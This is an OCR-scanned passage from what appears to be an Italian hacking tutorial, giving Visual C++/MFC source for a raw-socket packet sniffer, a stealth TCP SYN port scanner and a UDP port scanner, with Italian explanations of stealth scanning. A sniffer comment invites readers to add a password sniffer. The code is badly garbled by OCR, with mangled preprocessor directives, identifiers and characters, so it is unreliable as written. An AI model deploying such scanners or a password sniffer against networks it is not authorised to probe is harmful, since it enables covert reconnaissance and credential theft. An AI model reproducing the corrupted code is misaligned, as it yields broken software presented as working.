strProtocol= "TCP "; 
else if (ipHeader. Protocol==IPPROTO_UDP) 

strProtocol= "UDP "; 
else if (ipHeader . Protocol==IPPROTO_ICMP) 

strProtocol= "ICMP "; 

else 

strProtocol="Other" ; 

strInfo+=strProtocol; 

//Print out some data 
m_pList—>AddString (strlnfo) ; 

//Find the size of IP header (may have options) 
unsigned long ulIPHeaderSize; 

ulIPHeaderSize= (ipHeader . HeaderLength_Version & 0x0f)*4; 

//Read the protocol header (ignore IP options) 

unsigned long IPos; 

lPos=ulIPHeaderSize; 

if (ipHeader .Protocol==IPPROTO_TCP) 

AnalyzeTCP (cBuffer+lPos) ; 
else if (ipHeader. Protocol==IPPROTO_UDP) 

AnalyzeUDP (cBuffer+lPos) ; 
else if (ipHeader. Protocol==IPPROTO_ICMP) 

AnalyzeICMP (cBuffer+lPos) ; 

} 

//Read ali the data 

//I 'm sure however wants to use this will add his packet analyzer 
//Password sniffer here, have fun 

return TRUE; 

) 

void CClientSocket :: AnalyzeICMP (char *cICMPBuffer) 
{ 

//Read the ICMP header 
ICMPHeader icmpHeader; 

memcpy (SicmpHeader, cICMPBuffer, ICMPHeaderLength) ; 

//Print out the code 
CString strICMP; 
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char cICMP[10]; 

ltoa (icmpHeader . ICMPType, cICMP, 10) ; 

strICMP="ICMP type: "; 
strICMP+=cICMP ; 

//Convert again 

ltoa (icmpHeader . ICMPCode, cICMP, 10) ; 

strICMP+=", code: "; 
strICMP+=cICMP ; 

m_pList->AddString (strICMP) ; 



void CClientSocket : -.AnalyzeTCP (char *cTCPBuffer) 
{ 

//Read the ICMP header 
TCPHeader tcpHeader; 

memcpy (StcpHeader, cTCPBuffer, TCPHeaderLength) ; 

//Print out the code 
CString strTCP; 

//Convert to strings 
char cTCP[10]; 

ltoa (htons (tcpHeader . SourcePort) , cTCP, 10) ; 

strTCP="Source port : "; 
strTCP+=cTCP ; 

//Convert again 

ltoa (htons (tcpHeader . DestinationPort ) , cTCP, 10) ; 

strTCP+=", destination port: "; 
strTCP+=cTCP ; 

m_pList->AddString (strTCP) ; 



void CClientSocket : -.AnalyzeUDP (char *cUDPBuffer) 
{ 

//Read the ICMP header 
UDPHeader udpHeader; 

memcpy (SudpHeader, cUDPBuffer, UDPHeaderLength) ; 

//Print out the code 
CString strUDP; 

//Convert to strings 
char cUDP[10]; 

ltoa (htons (udpHeader . SourcePort) , cUDP, 10) ; 

strUDP="Source port: "; 
strUDP+=cUDP ; 

//Convert again 

ltoa (htons (udpHeader . DestinationPort ) , cUDP, 10) ; 

strUDP+=" , destination port: "; 
strUDP+=cUDP; 

m_pList->AddString (strUDP) ; 



void CClientSocket :: CaptureOutgoing (BOOL bCapture) 
{ 

m_bOutgoing=bCapture ; 



Gli altri files sono quelli creati di default dal generatore di Visual Studio. 

Ricordatevi che potete copiare il files dentro alla directory del progetto ed includerli mediante 

le apposite opzioni del menu di quest'ultimo. 

Quando si parla di scanner ne possiamo trovare di passivi e di attivi. 
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Uno scanner attivo tenta di connettarsi ad un determinato indirizzo e poi crea un log mediante 
i dati ricevuti da questo. 

Uno scanner passivo invece invia un segnale SYNC e poi attende per vedere che cosa viene 
restituito. 

Se riceve indietro un SYN+RST significa che su questa porta non c'è nulla mentre se viene 
restituito SYN+ACK allora significa che il socket corrispondente è pronto per essere 
connesso. 

Uno scanner passivo detto anche StealthScanner creato con il supporto delle classi che 
stiamo vedendo è il seguente. 

Sempre con il generatore di applicazioni di Visual Studio creaiamo una nuova applicazione 
basata sulla dialog chiamata StealthTCPScanner. 



URL 




Il file delle risorse .RC è quello che segue : 

//Microsoft Developer Studio generateci resource script. 

// 

iinclude "resource .h" 

idefine APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generateci front the TEXTINCLUDE 2 resource. 

// 

^include "afxres.h" 

///////////////////////////////////////////////////////////////////////////// 
iundef APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// English (U.S.) resources 

§if ! defined (AFX_RESOURCE_DLL ) // defined (AFX_ TARG_ENU) 
Hfdef _WIN32 

LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 
ipragma code _page (1252) 
iendif //_WIN32 

iifdef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// TEXTINCLUDE 

// 

1 TEXTINCLUDE DISCARDABLE 
BEGIN 

"resource. h\0" 

END 

2 TEXTINCLUDE DISCARDABLE 
BEGIN 

"iinclude " "afxres .h""\r\n" 
"\0" 
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END 



3 TEXTINCLUDE DISCARDABLE 
BEGIN 

"ideflne _AFX_NO_SPLITTER_RESOURCES\r\n " 
"idefine _AFX_NO_OLE_RESOURCES\r\n " 
"ideflne _AFX_NO_TRACKER_RESOURCES\r\n " 
"ideflne _AFX_NO_PROPERTY_RESOURCES\r\n " 
"\r\n" 

"iif ! defined (AFX_RESOURCE_DLL) Il defined (AFX_TARG__ENU)\r\n" 

"iifdef _WIN32\r\n" 

"LANGUAGE 9, l\r\n" 

"ipragma code^page (1252) \r\n" 

"iendlf //_WIN32\r\n" 

"iinclude " "res\\StealthTCPScanner . rc2" " // non-Microsoft Visual C++ edited 
resources\r\n " 

"iinclude " "afxres . re" " // Standard components\r\n" 

"iendif\r\n" 

"\0" 

END 

iendlf // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// Icon 

// 

// Icon with lowest ID value placed first to ensure application icon 
// remains consistent on ali systems. 

IDR_MAINFRAME ICON DISCARDABLE "res\\StealthTCPScanner . ico" 

///////////////////////////////////////////////////////////////////////////// 
// 

// Dialog 

// 

IDD_ABOUTBOX DIALOG DISCARDABLE 0, 0, 235, 55 

STYLE DS_MODALFRAME / WS_POPUP / WS_CAPTION / WS_SYSMENU 

CAPTION "About StealthTCPScanner" 

FONT 8, "MS Sans Serif 

BEGIN 

ICON IDR_MAINFRAME, IDC_STATIC, 11,17, 20, 20 

LTEXT "StealthTCPScanner Version 1 . 0", IDC_STATIC, 40, 10, 119, 8, 

SS_NOPREFIX 

LTEXT "Copyright (C) 2001" , IDC_STATIC, 40 , 25 , 119, 8 

DEFPUSHBUTTON "OK", IDOK, 1 78, 7, 50,14, WS_GROUP 

END 



IDD_ S TE AL THTCPSCANNER_DIALOG DIALOGEX 0, 0, 320, 178 

STYLE DS MODALFRAME / WS_POPUP / WS^VISIBLE / WS^CAPTION / WS^SYSMENU 

EXSTYLE WS_EX_APPWINDOW 

CAPTION "StealthTCPScanner" 

FONT 8, "MS Sans Serif" 

BEGIN 

EDITTEXT IDC_ADDRESS, 64,14,198,12, ES_AUTOHSCROLL 

CONTROL "IPAddressl", IDC_DESTINATIONIP, "SysIPAddress32", 

WS_TABSTOP, 64, 31, 197, 18, WS__EX__ TRANSPARENT 
EDITTEXT IDC_STARTPORT, 64, 52, 53, 12, ES_AUTOHSCROLL 

EDITTEXT IDC_ENDPORT, 64, 66, 53, 12, ES_AUTOHSCROLL 

EDITTEXT IDC_DELAY, 64, 79, 53, 12, ES_AUTOHSCROLL 

LISTBOX IDC_ INTERFACELIST, 197, 63, 76, 55, LBS_SORT / 

LBS_NOINTEGRALHEIGHT / WS__VSCROLL / WS_TABSTOP 
CONTROL "Auto scroll" , IDC_SCROLL, "Button" , BS_AUTOCHECKBOX / 

WS_TABSTOP, 136, 112, 46, 12 
PUSHBVTTON "Scan", IDC_SCAN, 125, 53, 43, 12 

PUSHBUTTON "Quit ", IDC_QUIT, 125, 69, 43, 12 

LISTBOX IDC_TCPLIST, 14, 110, 112, 50, LBS_NOINTEGRALHEIGHT / 

LBS_NOSEL I WS_VSCROLL 
LTEXT "Available interfaces : " , IDC_STATIC, 199, 51, 72, 10 

LTEXT "Scan address" , IDC_STATIC, 14 , 36, 56, 10 

LTEXT "Start port", IDC_STATIC, 14, 50, 38, 10 

LTEXT "Stop port ", IDC_STATIC, 14, 65, 40, 10 

LTEXT "Delay (ms) ", IDC_STATIC, 15, 80, 40, 10 

LTEXT "URL", IDC_STATIC, 13, 1 7, 46, 10 
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121, 9 

END 



ilfndef _MAC 

///////////////////////////////////////////////////////////////////////////// 
// 

// Ver sion 

// 

VS_VERSION_INFO VERSIONINFO 

FILEVERSION 1,0,0,1 

PRODUCTVERSION 1,0,0,1 

FILEFLAGSMASK 0x3fL 
#ifdef _DEBUG 

FILEFLAGS Oxl L 
#else 

FILEFLAGS OxOL 
iendif 

FILEOS 0x4L 

FILETYPE OxlL 

FILESUB TYPE OxOL 
BEGIN 

BLOCK "StringFilelnfo " 
BEGIN 

BLOCK "040904B0" 

BEGIN 

VAL ITE "CompanyName", "\0" 

VALUE "FileDescription" , "StealthTCPScanner MFC Application\0" 

VALUE "FileVersion", "1, 0, 0, 1\0" 

VALUE "InternalName", "StealthTCPScanner\0" 

VALUE "LegalCopyright", "Copyright (C) 2001\0" 

VALUE "LegalTrademarks", "\0" 

VALUE "OriginalFilename" , "StealthTCPScanner .EXE\0" 
VALUE "ProductName", "StealthTCPScanner Application\0" 
VALUE "ProductVersion", "1, 0, 0, 1\0" 

END 

END 

BLOCK "VarFilelnfo" 
BEGIN 

VALUE " Trans lat ion" , 0x409, 1200 

END 

END 

#endif // !__MAC 



///////////////////////////////////////////////////////////////////////////// 
// 

// DESIGNINFO 

// 

iifdef APSTUDIO_INVOKED 
GUIDELINES DESIGNINFO DISCARDABLE 
BEGIN 

IDD_ABOUTBOX, DIALOG 
BEGIN 

LEFTMARGIN, 7 
RIGHTMARGIN, 228 
TOPMARGIN, 7 
BOTTOMMARGIN, 48 

END 

IDD_STEALTHTCPSCANNER_DIALOG, DIALOG 
BEGIN 

LEFTMARGIN, 7 

RIGHTMARGIN, 313 

TOPMARGIN, 7 

BOTTOMMARGIN, 1 71 

END 

END 

iendif // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 
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// 

STRINGTABLE DISCARDABLE 
BEGIN 

IDS_ABOUTBOX "SAbout StealthTCPScanner . . . " 

END 

iendif // English (U.S.) resources 

///////////////////////////////////////////////////////////////////////////// 



iifndef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generateci front the TEXTINCLUDE 3 resource. 

// 

idefine _AFX_NO_SPLITTER_RESOURCES 
idefine _AFX_NO_OLE__RESOURCES 
idefine AFX_NO_ TRACKER_RESOURCES 
idefine __AFX_NO_PROPERTY_RESOURCES 

Hf ! defined (AFX_RESOURCE_DLL ) // defined (AFX_ TARG ENU) 

Hfdef _WIN32 

LANGUAGE 9, 1 

ipragma code _page (1252) 

iendif //_WIN32 

iinclude "res\StealthTCPScanner . rc2 " // non-Microsoft Visual C++ edited resources 

iinclude "afxres . re" // Standard components 

iendif 

///////////////////////////////////////////////////////////////////////////// 
iendif // not APSTUDIO_INVOKED 

Come nell'esempio precedente le fnzioni di gestione della dialog sono contenute dentro ai file 
StealthTCPScannerDIg.h e StealthTCPScannerDIg.cpp. 

// StealthTCPScannerDIg.h : header file 

// 

#if 

!defined(AFX_STEALTHTCPSCANNERDLG_H_9B2D0C57_D681_4D6D_A1DE_67C3B14 
295F7_INCLUDED_) 

idefine AFX__STEALTHTCPSCANNERDLG_H 9B2D0C57_D681_4D6D__A1DE_67C3B14295F7 INCLUDED_ 

Hf _MSC_VER > 1000 
ipragma once 

iendif // _MSC_VER > 1000 
iinclude "ClientSocket . h " 

///////////////////////////////////////////////////////////////////////////// 
// CStealthTCPScannerDlg dialog 

class CStealthTCPScannerDlg : public CDialog 
{ 

// Construction 
public: 

CStealthTCPScannerDlg (CWnd* pParent = NULL) ; // standard constructor 

// Dialog Data 

//{ (AFX_DATA (CStealthTCPScannerDlg) 

enum { IDD = IDD_STEALTHTCPSCANNER_DIALOG }; 

CListBox m_TCPList; 

CIPAddressCtrl m_DestinationIP ; 

CListBox mlnterfaceList; 

CStringm_URL; 

long mScanDelay; 

long m_EndPort; 

long m_Loop; 

BOOL m_AutoScroll; 

long m_StartPort ; 

//} }AFX_DATA 
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//{ {AFX_VIRTUAL (CStealthTCPScannerDlg) 
protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

HICON m_hIcon; 

// Generated message map functions 
//{{AFX_JiSG (CStealthTCPScannerDlg) 
virtual BOOL OnlnitDialog () ; 

afx_msg void OnSysCommand (UINT nID, LPARAM lParam) ; 
afx_msg void OnPaintO; 
afx_msg HCURSOR OnQueryDraglcon ( ) ; 
afx_msg void OnScan () ; 
afx_msg void OnQuit () ; 
afx_msg void OnDestroy () ; 
//} }AFX_MSG 
DECLARE_MESSAGE_MAP () 
private: 

BOOL CreateSocket () ; 

/ /Convert from the control to a string 
LPSTR IPCtrlToSTR(CIPAddressCtrl* etri); 

//Convert address (DNS) 
BOOL ConvertAddress ( ) ; 

//Stealth scan 
BOOL Scan(); 

//Build the interface list 
BOOL BuildlnterfaceList () ; 

//Our socket to scan with 
CClientSocket* m_Socket; 

}; 

//{ {AFX_INSERT_LOCATION} } 

// Microsoft Visual C++ will insert additional declarations immediately before the 
previous line . 

iendif // 

! defined (AFX_STEALTHTCPSCANNERDLG_H 9B2D0C57_D681_4D6D_A1DE_67C3B14295F7 INCLUDED_) 

Qui a seguito invece è I file .CPP 

// StealthTCPScannerDlg . epp : implementation file 

// 

^include "stdafx.h" 

^include "StealthTCPScanner . h" 

iinclude "StealthTCPScannerDlg. h " 

iinclude " . . \Interfaces . h " 

Hfdef _DEBUG 
idefine new DEBUG_NEW 
iundef THISFILE 

static char THIS_FILE[] = FILE : 

iendif 

///////////////////////////////////////////////////////////////////////////// 
// CAboutDlg dialog used for App About 

class CAboutDlg : public CDialog 
{ 

public: 

CAboutDlg () ; 

// Dialog Data 

//{ {AFX_DATA (CAboutDlg) 
enum { IDD = IDD_ABOUTBOX }; 
//} }AFX_DATA 

// ClassWizard generated virtual function overrides 
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//{ {AFX_VIRTUAL (CAboutDlg) 
protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

//{ {AFX^MSG (CAboutDlg) 

//} }AFX__MSG 

DECLARE_MESSAGE_MAP () 

ì; 

CAboutDlg: -.CAboutDlg () : CDialog (CAboutDlg: : IDD) 
{ 

//{ {AFX_DATA_INIT (CAboutDlg) 
//} }AFX_DATA_INIT 

} 

void CAboutDlg: : DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 
// { {AFX_DATA_MAP (CAboutDlg) 
//} }AFX_DATA_MAP 

) 

BEGIN_MESSAGE_MAP (CAboutDlg, CDialog) 

//{ {AFX_MSG_MAP (CAboutDlg) 

// No message handlers 

//} }AFX__MSG_MAP 
END__MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CStealthTCPScannerDlg dialog 

CStealthTCPScannerDlg: : CStealthTCPScannerDlg (CWnd* pParent /*=NULL*/) 
: CDialog (CStealthTCPScannerDlg :: IDD, pParent) 

{ 

//( {AFX_DATA_INIT (CStealthTCPScannerDlg) 

m_URL = _T(" ") ; 

m_ScanDelay = 20; 

m_EndPort = 0; 

m_AutoScroll = TRUE; 

m_StartPort = 0; 

//} }AFX_DATA_INIT 

// Note that Loadlcon does not require a subsequent Destroylcon in Win32 
m_hIcon = AfxGetApp ( ) —>LoadIcon (IDR_MAINFRAME) ; 

) 

void CStealthTCPScannerDlg : : DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 
/ 7 { {AFX_DATA_MAP (CStealthTCPScannerDlg) 
DDX_Control (pDX, IDC_TCPLIST, m_TCPList) ; 
DDX_Control (pDX, IDC_DESTINATIONIP , m_DestinationIP) ; 
DDX_Control (pDX, IDC_ INTERFACELIST, m_InterfaceList) ; 
DDX_Text (pDX, IDC_ADDRESS, m_URL) ; 
DDX Text (pDX, IDC_DELAY, m_ScanDelay) ; 
DDV_MinMaxLong(pDX, m_ScanDelay, 0, 1000); 
DDX_Text(pDX, IDC_ENDPORT , m_EndPort) ; 
DDV__MinMaxLong(pDX, m_EndPort, 0, 65535); 
DDX__Check(pDX, IDC__SCROLL, m_AutoScroll) ; 
DDX_Text (pDX, IDC STARTPORT , m_StartPort) ; 
DDV_MinMaxLong (pDX, m_StartPort, 0, 65535); 
//} }AFX_DATA_MAP 

ì 

BEGIN_MESSAGE__MAP (CStealthTCPScannerDlg, CDialog) 

//{ {AFX MSG_MAP (CStealthTCPScannerDlg) 

ON_WM_SYSCOMMAND () 

ON_WM_PAINT() 

0N_ WM_ QUER YDRAGICON ( ) 

ON__BN_CLICKED(IDC_SCAN, OnScan) 

ON__BN_CLICKED (IDC_QUIT, OnQuit ) 

0N_ WM_DESTROY ( ) 

//} }AFX_MSG_MAP 
END_MESSAGE_MAP () 
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///////////////////////////////////////////////////////////////////////////// 

// CStealthTCPScannerDlg message handlers 

BOOL CStealthTCPScannerDlg : : OnlnitDialog () 
{ 

CDialog: -.OnlnitDialog () ; 

// Add "About . . . " menu item to system menu. 

// IDM_ABOUTBOX must be in the system command range. 
ASSERT ( ( IDM_ABOUTBOX S OxFFFO) == IDM__ABOUTBOX) ; 
ASSERT (IDM_ABOVTBOX < OxFOOO) ; 

CMenu* pSysMenu = GetSystemMenu (FALSE) ; 

if (pSysMenu != NULL) 

{ 

CString strAboutMenu; 

strAboutMenu . LoadString (IDS_ABOUTBOX) ; 

if (! strAboutMenu. IsEmpty () ) 

{ 

pSysMenu->AppendMenu (MF_SEPARATOR) ; 

pSysMenu->AppendMenu (MF_STRING, IDM__ABOUTBOX, strAboutMenu) ; 

) 

} 

// Set the icon for this dialog. The framework does this automatically 
// when the application ' s main window is not a dialog 
Setlcon (m_h!con, TRUE) ; // Set big icon 

Setlcon (m_hIcon, FALSE) ; // Set small icon 

m_Socket=new CClientSocket (&m_TCPList,m_AutoScroll) ; 

if ( ! CSpoofBase : : InitializeSockets () ) 
{ 

delete m_Socket; 
return FALSE; 

} 

//Build socket list 

return BuildlnterfaceList () ; // return TRUE unless you set the focus to a 

control 
} 

void CStealthTCPScannerDlg: : OnSysCommand (UINT nID, LPARAM lParam) 
{ 

if ((nID & OxFFFO) == IDM_ABOUTBOX) 
{ 

CAboutDlg dlgAbout; 
dlgAbout . DoModal () ; 

} 

else 
{ 

CDialog: : OnSysCommand (nID, lParam) ; 

} 

} 

// If you add a minimize button to your dialog, you will need the code below 
// to draw the icon. For MFC applications using the document/view model, 
// this is automatically done for you by the framework. 

void CStealthTCPScannerDlg : :OnPaint () 
{ 

if (Islconic () ) 
{ 

CPaintDC de (this); // device context for painting 

SendMessage (WM_ICONERASEBKGND , (WPARAM) de . GetSafeHdc () , 0) ; 

// Center icon in client rectangle 

int cxlcon = GetSystemMetrics (SM_CXICON) ; 

int cyleon = GetSystemMetrics (SM_CYICON) ; 

CRect rect ; 

GetClientRect (Srect) ; 

int x = (rect.Widthf) - cxlcon + 1) / 2; 
int y = (rect .Height () - cyleon + 1) / 2; 
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de . Drawlcon (x, y, m_hIcon) ; 

} 

else 
{ 

CDialog: -.OnPaint () ; 

} 

} 

// The system calls this to obtain the cursor to display while the user dcags 
// the minimized window. 

HCURSOR CStealthTCPScannerDlg : : OnQueryDraglcon ( ) 
{ 

return (HCURSOR) m^hlcon; 

ì 



BOOL CStealthTCPScannerDlg: : BuildlnterfaceList () 
{ 

//Get the list of interfaces 
CInterfaces* plnter; 
plnter=new CInterfaces; 

//Only if we have the interfaces 
if (pInter->GetInterfaces()) 
{ 

//Build the list 
BOOL bQuit; 
bQuit=FALSE; 



while (! bQuit) 
{ 

//Only if not a loopback interface 

if ( !pInter->IsLoopback () ) 

{ 

//Get the interface 
LPSTR lplnterface; 

lpInterface=pInter->LongToString (pInter->GetAddress () ) ; 
//Add it to the list 

m_InterfaceList . AddString (lplnterface) ; 

} 



//Get next interface 
bQuit=!p!nter->MoveNext () ; 



delete plnter; 
return TRUE; 



delete plnter; 
return FALSE; 



void CStealthTCPScannerDlg: :OnScan () 
{ 

if (UpdateData (TRUE) ) 

if (m_InterfaceList . GetCurSel () ! =LB_ERR) 
Scan () ; 

else 

MessageBox ( "Please choose an interface! ", "Error" ,MB_OK) ; 

) 



BOOL CStealthTCPScannerDlg : :Scan () 
{ 

if ( ! ConvertAddress ()) 
return FALSE; 



if ( ! CreateSocket () ) 
return FALSE; 



//Bind the socket 
CString strBind; 

m_InterfaceList . GetText (m_InterfaceList . GetCurSel () , strBind) ; 
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m_Socket- 

>Scan (strBind. GetBuffer(O) , IPCtrlToSTR (&m__DestinationIP) , m_StartPort , m_EndPort , m_ScanD 
elay) ; 

return TRUE; 

ì 

BOOL CStealthTCPScannerDlg : : ConvertAddress () 
{ 

if (m_URL=="") 

return TRUE; 

long IAddr; 

lAddr=m_Socket->ResolveDNS (m_URL) ; 

if (lAddr) 
{ 

//Correct 

m_DestinationIP . SetAddress (htonl (lAddr) ) ; 

//Clear the address 
m_URL=" "; 



} 

else 



//Display error 

MessageBox("Couldn't resolve host name" , "Error" , MB_OK) ; 



return lAddr; 



} 



LPSTR CStealthTCPScannerDlg: : IPCtrlToSTR (CIPAddressCtrl* etri) 
{ 

//Converts the control address to textual address 

//Convert bytes to string 

BYTE bOctetl; 

BYTE b0ctet2; 

BYTE b0ctet3; 

BYTE b0ctet4; 

//Get the value and blank values 
int iBlank; 

iBlank=ctrl->GetAddress (bOctetl , b0ctet2 , b0ctet3 , b0ctet4) ; 

if (iBlank! =4) 

//Not filled 
return NULL; 

else 
l 

in_addr iAddr; 

iAddr. S_un . S_un_b. s_bl=bOctetl ; 
iAddr. S_un . S_un_b. S_b2=b0ctet2 ; 
iAddr. S_un . S_un_b. s_b3=bOctet3 ; 
iAddr. S_un . S_un_b. s_b4=bOctet4 ; 

return inet_ntoa (iAddr) ; 

} 

} 

void CStealthTCPScannerDlg: :OnQuit () 
{ 

//Quit 

EndDialog (0) ; 

} 

BOOL CStealthTCPScannerDlg : : CreateSocket () 
{ 

//Delete the old socket 
delete m_Socket ; 

//Recreate 

m_Socket=new CClientSocket (&m__TCPList , m_AutoScroll) ; 
m Socket— >SetRaw (TRUE) ; 
return m_Socket->Create () ; 
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{ 

CDlalog: : OnDestroy () ; 

//Delete the socket 
delete m_Socket; 

//Delete ali 

CSpoofBase : : ShutdownSockets () ; 

} 

Quando abbiamo parlatoi dei protocolli abbiamo visto la differenza tra il TCP e il protocollo 
UDP. 

Il secondo non essendo basato sulla connessione permette di inviare pacchetti sulla rete in 
modalità completamente asincrona. 

Uno scanner particolare legato al protocollo UDP può essere creato utilizzando le stesse 
regole degli altri esempi. 

Con il generatore di applicazioni di Visual Studio si richiede di creare un programma basato 
sulla dialog. 



1$ K.omodi3"5 LUI' bcaniKr 



URL I < 

Scafi aidess 



SBéP» |Q Qut 
Dafcw fina) p 

Loop [r 

R ùiJtn ìctdII 

Il sii coita aie operi, il is mestili duetD 
a Hiewal 

V/nt us al: hWwJfrmin knmaia.car, 




Il file RC contente le informazioni su questa dalog è : 

//Microsoft Developer Studio generated resource script . 

// 

^include "resource. h" 



idefine APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generated front the TEXTINCL UDE 2 resource. 

// 

^include "afxres.h" 

///////////////////////////////////////////////////////////////////////////// 
#undef APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// English (U.S.) resources 

#if !defined(AFX_RESOURCE_DLL) Il defined(AFX_TARG_ENU) 
iifdef _ WIN32 

LANGUAGE LANG__ENGLISH, SUBLANG_ENGLISH_US 
ipragma code _page (1252) 
iendif //_WIN32 

///////////////////////////////////////////////////////////////////////////// 
// 

// Dialog 

// 

IDD_ABOUTBOX DIALOG DISCARDABLE 0, 0, 193, 47 

STYLE DS_MODALFRAME / WS_POPUP / WS_CAPTION / WS_SYSMENU 

CAPTION "About UDPScaner" 

FONT 8, "MS Sans Serif" 
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BEGIN 

LTEXT 



"UDPScaner Version 1 . 0" , IDC__STATIC, 15, 15, 119, 8, 
SS_NOPREFIX 

LTEXT "Komodia, Copyright (C) 2000 " , IDC_STATIC, 15, 26, 119, 8 

DEFPUSHBUTTON "OK", IDOK, 136, 7, 50, 14, WS_GROUP 



END 



IDD_UDPSCANER_DIALOG DIALOGEX 0, 0, 283, 175 

STYLE DS MODALFRAME / WS_POPUP / WS_VISIBLE / WS_CAPTION / WS_SYSMENU 

EXSTYLE WS_EX_APPWINDOW 

CAPTION "Komodia 's UDP Scanner" 

FONT 8, "MS Sans Serif" 

BEGIN 

EDITTEXT IDC_ADDRESS, 64,14,198,12, ES_AVTOHSCROLL 

CONTROL "IPAddressl ", IDC_DESTINATIONIP, "SysIPAddress32 ", 

WS_TABSTOP, 64, 31, 197, 18, WS_EX_ TRANSPARENT 
EDITTEXT IDC__STARTPORT , 64, 52, 53, 12, ES_AUTOHSCROLL 

EDITTEXT IDC_ENDPORT, 64, 66, 53, 12, ES_AUTOHSCROLL 

EDITTEXT IDC_DELAY, 64, 79, 53, 12, ES^AUTOHSCROLL 

EDITTEXT IDC_LOOP, 64, 92, 53, 12, ES_AUTOHSCROLL 

LISTBOX IDC_UDPLIST, 14, 110, 112, 50, LBS_NOINTEGRALHEIGHT / 

LBS_NOSEL I WS_VSCROLL 
CONTROL "Auto scroll" , IDC__SCROLL, "Button" , BS_AUTOCHECKBOX / 

WS_TABSTOP, 136, 112, 46, 12 
PUSHBUTTON "Scan ", IDC_SCAN, 125, 53, 43, 12 

PUSHBVTTON "Quit ", IDC_QUIT, 125, 69, 43, 12 

LTEXT "Scan address" , IDC^STATIC, 14, 36, 56, 10 

LTEXT "Start port", IDC^STATIC, 14, 50, 38, 10 

LTEXT "Stop port ", IDC_STATIC, 14, 65, 40, 10 

LTEXT "Delay (ms) " , IDC^STATIC, 15, 80, 40, 10 

LTEXT "If ali ports are open, it is mostly due to a firewall" , 

IDC_STATIC, 135, 127, 121, 18 
LTEXT "Loop ", IDC_STATIC, 15, 94, 40,10 

LTEXT "URL ", IDC_STATIC, 13,17 , 46,10 

LTEXT "Visit us at : http : //www. komodia . com" , IDC_STATIC, 135, 145, 

121, 9 

END 



iifndef __MAC 

///////////////////////////////////////////////////////////////////////////// 
// 

// Version 

// 

VS_VERSION_INFO VERSIONINFO 

FILEVERSION 1,0,0,1 

PRODUCTVERSION 1,0,0,1 

FILEFLAGSMASK 0x3fL 
Hfdef _DEBUG 

FILEFLAGS Oxl L 
#else 

FILEFLAGS OxOL 
iendif 

FILEOS 0x4L 

FILETYPE OxlL 

FILESUB TYPE OxOL 
BEGIN 

BLOCK "StringFilelnfo " 
BEGIN 

BLOCK "040904B0" 

BEGIN 

VALUE "CompanyName" , "\0" 

VALUE "FileDescription" , "UDPScaner MFC Application\0" 

VALUE "FileVersion", "1, 0, 0, 1\0" 

VALUE "InternalName", "UDPScaner\0" 

VALUE "LegalCopyright" , "Copyright (C) 2000\0" 

VALUE "LegalTrademarks", "\0" 

VALUE "OriginalFilename" , "UDPScaner . EXE\0" 

VALUE "ProductName" , "UDPScaner Application\0" 

VALUE "ProductVersion", "1, 0, 0, 1\0" 

END 

END 

BLOCK "VarFilelnfo" 
BEGIN 

VALUE "Translation", 0x409, 1200 
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END 

iendif // l_MAC 



///////////////////////////////////////////////////////////////////////////// 
// 

// DESIGNINFO 

// 

iifdef APSTUDIO_INVOKED 
GUIDELINES DESIGNINFO DISCARDABLE 
BEGIN 

IDD_ABOUTBOX, DIALOG 
BEGIN 

LEFTMARGIN, 7 
RIGHTMARGIN, 186 
TOPMARGIN, 7 
BOTTOMMARGIN, 40 

END 

IDD_UDPSCANER_DIALOG, DIALOG 
BEGIN 

LEFTMARGIN, 7 

RIGHTMARGIN, 276 

TOPMARGIN, 7 

BOTTOMMARGIN, 168 

END 

END 

iendif // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// String Table 

// 

STRINGTABLE DISCARDABLE 
BEGIN 

IDS_ABOUTBOX "SAbout UDPScaner. . . " 

END 

#endif // English (U.S.) resources 

///////////////////////////////////////////////////////////////////////////// 



///////////////////////////////////////////////////////////////////////////// 
// Unknown language: OxD, Oxl resources 

#lf ! defined (AFX__RESOURCE_DLL ) // defined (AFX_TARG_HEB) 
iifdef _WIN32 
LANGUAGE OxD, Oxl 
ipragma code _page (1255) 
iendif //_WIN32 

iifdef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// TEXTINCLUDE 

// 

1 TEXTINCLUDE DISCARDABLE 
BEGIN 

"resource .h\0" 

END 

2 TEXTINCLUDE DISCARDABLE 
BEGIN 

"iinclude " "afxres .h""\r\n" 
"\0" 

END 

3 TEXTINCLUDE DISCARDABLE 
BEGIN 

"idefine _AFX_NO_SPLITTER_RESOURCES\r\n " 
"idefine _AFX_NO_OLE_RESOURCES\r\n " 
'■idefine _AFX_NO_TRACKER__RESOURCES\r\n - 
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"#define _AFX_NO_PROPERTY_RESOURCES\r\n " 
"\r\n" 

"iif ! defined (AFX^RESOURCE DLL) Il defined (AFX_TARG_ENU)\r\n" 

"iifdef _WIN32\r\n" 

"LANGUAGE 9, l\r\n" 

"ipragma code_page (1252) \r\n" 

"iendif //_WIN32\r\n" 

"iinclude " "res\\UDPScaner . rc2" " // non-Microsoft Visual C++ edited 
resources\r\n " 

"iinclude ""afxres.ro"" // Standard components\r\n" 

"#endif\r\n" 

"\0" 

END 

iendif // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// Icon 

// 

// Icon with lowest ID valile placed first to ensure application icon 
// remains consistent on ali systems. 

IDR_MAINFRAME ICON DISCARDABLE "res\\UDPScaner . ico" 

